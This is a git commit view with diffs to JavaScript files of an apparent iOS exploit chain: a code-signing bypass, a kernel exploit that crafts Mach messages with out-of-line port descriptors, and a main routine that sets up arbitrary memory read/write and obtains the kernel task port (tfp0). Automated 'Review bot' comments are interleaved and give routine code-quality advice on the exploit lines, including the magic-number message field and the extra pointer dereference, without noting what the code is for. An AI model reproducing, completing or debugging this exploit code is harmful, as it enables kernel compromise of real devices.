| author | spv420 <spv@spv.sh> | 2022-07-15 15:03:50 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-15 15:03:50 -0400 |
| commit | 42647b796f0f54122e7f46522d8e681825daf54b (patch) | |
| tree | 6886bfea221b15579b84ff13d1b850a1ac9f5fcf /src/js | |
| parent | d1da310f02adc0e9b5f8656ea063fd3231901611 (diff) | |
dump
Diffstat (limited to 'src/js')
| -rw-r--r-- | src/js/csbypass.js | 2 | ||||
| -rwxr-xr-x | src/js/kexp/exploit.js | 8 | ||||
| -rw-r--r-- | src/js/main.js | 6 |
3 files changed, 10 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 8f7a56e..3065099 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) {
 printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test);
+ call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
 printf("fuck1\n");
 callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
 printf("fuck2\n");
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 write_u32(InP + 0x18, 1);
 write_u32(InP + 0x1c, init_port_set);
 write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x24, 0x0213c600);
 write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
 write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
 write_u32(InP + 0x30, fake_count);
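Review bot: The new `call4arg(...)` line passes `read_u32(read_u32(my_kIOSurfaceBytesPerRow))` and a trailing literal `0` with no comment, while the line it replaces passed four consecutive reads of the same buffer, so a reader cannot tell whether the extra dereference and the changed arity are a fix or an experiment. Add a one-line comment above it, e.g. `// TODO: document why BytesPerRow is now read through one extra pointer, why the call dropped to four args, and what the trailing 0 is`. The surrounding `printf("fuck1\n")` / `printf("fuck2\n")` markers would be more useful as messages naming the step being traced. The enclosing function starts before the hunk and continues after it.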
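Review bot: `write_u32(InP + 0x24, 0x0213c600);` replaces a self-describing expression with a magic number, dropping the named `MACH_MSG_OOL_PORTS_DESCRIPTOR` constant and the `19 << 16` count from the source, and the commit message ("dump") does not say why. If this is meant as the folded value of the old expression, note that its low 16 bits are non-zero whereas the old expression shifts everything to bit 16 and above, so a comment should state whether that difference is deliberate; otherwise rebuild the value from named parts. A minimal fix is `write_u32(InP + 0x24, 0x0213c600); // TODO: decode into named fields; was (19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)`. r3gister starts before the hunk and continues after it.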
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) { function mach_ports_lookup_shit() { printf("fuck\n"); var arrz = shit_heap(4); + var arrz2 = shit_heap(4); printf("fuck\n"); - write_u32(arrz, 0); + write_u32(arrz, arrz2); + write_u32(arrz2, 0); printf("fuck\n"); var sz = shit_heap(4);; printf("fuck\n"); @@ -359,6 +361,7 @@ function mach_ports_lookup_shit() { // var mts = mach_task_self(); printf("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); + scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("mpl success\n"); return read_u32(read_u32(arrz) + 8); @@ -461,7 +464,6 @@ again: while (true) { // while (true) { // // } - scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("fuck\n"); // var fake_port = read_u32(read_u32(arrz) + 8); diff --git a/src/js/main.js b/src/js/main.js index 5c45e85..75d730d 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -77,14 +77,16 @@ function main() { large_buf[0] = 0x41424344; printf("%x\n", read_u32(large_buf_ptr)); + setup_fancy_rw(); + // csbypass(); // return; - setup_fancy_rw(); printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0')); - + +//return; var tfp0 = get_kernel_task(); printf("tfp0=%x\n", tfp0); |
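Review bot: The added `var arrz2 = shit_heap(4);` and `write_u32(arrz, arrz2);` introduce a second buffer and an extra level of indirection for the later `mach_ports_lookup` call without a comment on why one buffer is no longer enough. Add a line such as `// TODO: explain why arrz must point at a second zeroed word instead of holding 0 directly`. The pre-existing context line `var sz = shit_heap(4);;` has a doubled semicolon that could be cleaned up while here. mach_ports_lookup_shit continues past the hunk.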
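Review bot: The `scall("printf", "done %x %x %x %x\n", ...)` line moved into mach_ports_lookup_shit reads `kp`, which is not declared anywhere in the visible part of this function; at its old location (the removed line inside the `again:` loop hunk) it may have resolved to a local of that loop, in which case it is now an unresolved reference here. If `kp` is a module-level variable this is fine, but then a comment such as `// kp is module-level, set by the caller — TODO confirm` would save the next reader the search; otherwise pass it in as a parameter. This function starts in the previous hunk and its end is outside the view.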
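Review bot: `//return;` is new commented-out code placed right after the existing `// csbypass();` / `// return;` pair, so main now carries three disabled statements and no note on which early exit is intended; delete the dead lines or gate the stop behind a real constant such as `const STOP_AFTER_DUMP = false;`. Moving `setup_fancy_rw();` above the commented lines changes nothing at runtime, since it still precedes the hexdump `printf`, so if an ordering requirement motivated the move it should be written down, e.g. `setup_fancy_rw(); // must run before the reads below — TODO confirm`. main continues past the hunk.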
